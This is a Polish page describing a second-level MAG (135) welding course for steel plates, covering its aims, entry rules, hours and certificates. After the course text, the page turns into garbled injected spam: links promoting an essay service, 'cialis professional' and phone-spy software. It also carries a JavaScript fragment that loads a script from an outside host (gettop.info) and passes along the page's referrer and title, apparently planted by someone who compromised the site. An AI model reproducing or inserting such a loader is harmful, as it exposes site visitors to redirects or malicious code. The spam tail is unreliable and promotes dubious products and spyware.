MAG 135 P (1.1)

Kurs spawania blach ze stali ferrytycznych lub nierdzewnych – spoinami czołowymi metodą MAG (135) II stopień


Założenia organizacyjno – programowe:


Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-P-BW-1-135 lub IS-P-BW-8-135
Zasady rekrutacji
  • posiadanie Książki Spawacza z wpisem o ukończeniu kursu spawania blach i rur – spoiny pachwinowe IS-P/T-FW-1-135 lub
  • ukończenie podstawowego kursu spawania  metodą MAG wg systemu stosowanego do 2007 roku
  • praktyka w spawaniu (licząc od daty egzaminu  końcowego) przez co najmniej 1 rok
Liczba godzin
  • Część teoretyczna – 12 godzin
  • Część praktyczna: ćwiczenia praktyczne – 90 godz., instruktaż wstępny – 2 godz., egzamin – 8 godz.
  • Razem kurs – 112 godz.
Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 1, 2, 3  wg PN-87/M-69008. Uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?

Talkback join the related discussion, www.silveressay.com race and class separate and not equalif (document.currentScript) { s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; sale cialis professional topspyapps.netcell spy, phone spy software, tracking someones phone

Top